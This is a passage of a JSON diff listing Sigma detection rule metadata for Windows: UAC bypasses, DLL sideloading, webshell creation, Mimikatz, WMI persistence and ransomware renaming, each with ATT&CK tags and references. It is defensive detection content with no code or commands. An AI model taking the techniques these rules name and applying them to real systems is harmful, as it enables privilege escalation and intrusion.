EventVwr" + }, + { + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/IDiagnosticProfileUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "value": "UAC Bypass Using IDiagnostic Profile - File" + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_ieinstal.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "value": "UAC Bypass Using IEInstal - File" + }, + { + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_msconfig_gui.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "41bb431f-56d8-4691-bb56-ed34e390906f", + "value": "UAC Bypass Using MSConfig Token Modification - File" + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "value": "UAC Bypass Using NTFS Reparse Point - File" + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_winsat.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "value": "UAC Bypass Abusing Winsat Path Parsing - File" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", + "value": "UAC Bypass Using Windows Media Player - File" + }, + { + "description": "Possible webshell file creation on a static web site", + "meta": { + "author": "Beyu Denis, oscd.community, Tim Shelton", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate administrator or developer creating legitimate executable files in a web application folder" + ], + "filename": "file_event_win_webshell_creation_detect.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "PT ESC rule and personal experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "value": "Windows Webshell Creation" + }, + { + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "meta": { + "author": "frack113", + "creation_date": "2022/05/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_werfault_dll_hijacking.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" + ] + }, + "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "value": "Creation of an WerFault.exe in Unusual Folder" + }, + { + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_winrm_awl_bypass.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File" + }, + { + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "meta": { + "author": "Florian Roth, Sittikorn S", + "creation_date": "2021/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_winword_cve_2021_40444.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", + "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ] + }, + "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "value": "Suspicious Word Cab File Write CVE-2021-40444" + }, + { + "description": "Detects the creation of the default output filename used by the wmicexec tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_wmiexec_default_filename.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1047" + ] + }, + "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "value": "Wmiexec Default Output File" + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "value": "Wmiprvse Wbemcomn DLL Hijack - File" + }, + { + "description": "Detects file writes of WMI script event consumer", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", + "falsepositive": [ + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + ], + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ] + }, + "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "value": "WMI Persistence - Script Event Consumer File Write" + }, + { + "description": "Detects creation of template files for Microsoft Office from outside Office", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/06/02", + "falsepositive": [ + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" + ], + "filename": "file_event_win_word_template_creation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_word_template_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "value": "Office Template Creation" + }, + { + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "filename": "file_event_win_wpbbin_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://persistence-info.github.io/Data/wpbbin.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ] + }, + "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "value": "UEFI Persistence Via Wpbbin - FileCreation" + }, + { + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_writing_local_admin_share.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1546.002" + ] + }, + "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", + "value": "Writing Local Admin Share" + }, + { + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": [ + "Application installation" + ], + "filename": "file_rename_win_not_dll_to_dll.yml", + "level": "medium", + "logsource.category": "file_rename", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ffforward/status/1481672378639912960", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml" + ], + "tags": "No established tags" + }, + "uuid": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "value": "Rename Common File to DLL File" + }, + { + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "meta": { + "author": "frack113", + "creation_date": "2022/07/16", + "falsepositive": [ + "Backup software" + ], + "filename": "file_rename_win_ransomware.yml", + "level": "medium", + "logsource.category": "file_rename", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", + "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", + "value": "Suspicious Appended Extension" + }, + { + "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "meta": { + "author": "Den Iuzvyk", + "creation_date": "2020/07/15", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_abusing_azure_browser_sso.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.002" + ] + }, + "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "value": "Abusing Azure Browser SSO" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_alternate_powershell_hosts_moduleload.yml", + "level": "low", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190610201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", + "value": "Alternate PowerShell Hosts - Image" + }, + { + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/02", + "falsepositive": [ + "Very unlikely" + ], + "filename": "image_load_defender_load_dll_from_nondefault_path.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "value": "Microsoft Defender Loading DLL from Nondefault Path" + }, + { + "description": "Detects DLL image load activity as used by FoggyWeb backdoor loader", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_foggyweb_nobelium.yml", + "level": "critical", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_foggyweb_nobelium.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ] + }, + "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", + "value": "FoggyWeb Backdoor DLL Loading" + }, + { + "description": "Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. Detects meterpreter's \"load powershell\" extension.", + "meta": { + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "creation_date": "2019/11/14", + "falsepositive": [ + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" + ], + "filename": "image_load_in_memory_powershell.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/p3nt4/PowerShdll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_in_memory_powershell.yml" + ], + "tags": [ + "attack.t1059.001", + "attack.execution" + ] + }, + "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "value": "In-memory PowerShell" + }, + { + "description": "Detects certain DLL loads when Mimikatz gets executed", + "meta": { + "author": "sigma", + "creation_date": "2017/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_mimikatz_inmemory_detection.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml" + ], + "tags": [ + "attack.s0002", + "attack.t1003", + "attack.lateral_movement", + "attack.credential_access", + "car.2019-04-004" + ] + }, + "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", + "value": "Mimikatz In-Memory" + }, + { + "description": "Detects both of CVE-2022-30190 / Follina and DogWalk vulnerability exploiting msdt.exe binary to load sdiageng.dll binary", + "meta": { + "author": "Greg (rule)", + "creation_date": "2022/06/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_msdt_sdiageng.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_msdt_sdiageng.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" + ] + }, + "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "value": "MSDT.exe Loading Diagnostic Library" + }, + { + "description": "Detects processes loading modules related to PCRE.NET package", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_pcre_net_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "value": "PCRE.NET Package Image Load" + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/05", + "falsepositive": [ + "Very unlikely" + ], + "filename": "image_load_pingback_backdoor.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ] + }, + "uuid": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", + "value": "Pingback Backdoor - Image" + }, + { + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_rundll32_loading_renamed_comsvcs.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1555200155351228419", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" + ] + }, + "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", + "value": "Rundll32 Loading Renamed Comsvcs DLL" + }, + { + "description": "Detects signs of the WMI script host process %SystemRoot%\\system32\\wbem\\scrcons.exe functionality being used via images being loaded by a process.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/09/02", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "filename": "image_load_scrcons_imageload_wmi_scripteventconsumer.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/HunterPlaybook/status/1301207718355759107", + "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", + "value": "WMI Script Host Process Image Loaded" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + ], + "filename": "image_load_side_load_antivirus.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", + "value": "Antivirus Software DLL Sideloading" + }, + { + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "filename": "image_load_side_load_dbgcore_dll.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "value": "DLL Sideloading Of DBGCORE.DLL" + }, + { + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "filename": "image_load_side_load_dbghelp_dll.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "value": "DLL Sideloading Of DBGHELP.DLL" + }, + { + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + ], + "filename": "image_load_side_load_from_non_system_location.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "value": "System DLL Sideloading From Non System Locations" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_side_load_office_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "value": "Microsoft Office DLL Sideload" + }, + { + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_scm.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_scm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", + "value": "SCM DLL Sideload" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_third_party.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "value": "Third Party Software DLL Sideloading" + }, + { + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "FP could occure if the legitimate version of vmGuestLib already exists on the system" + ], + "filename": "image_load_side_load_vmguestlib.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": 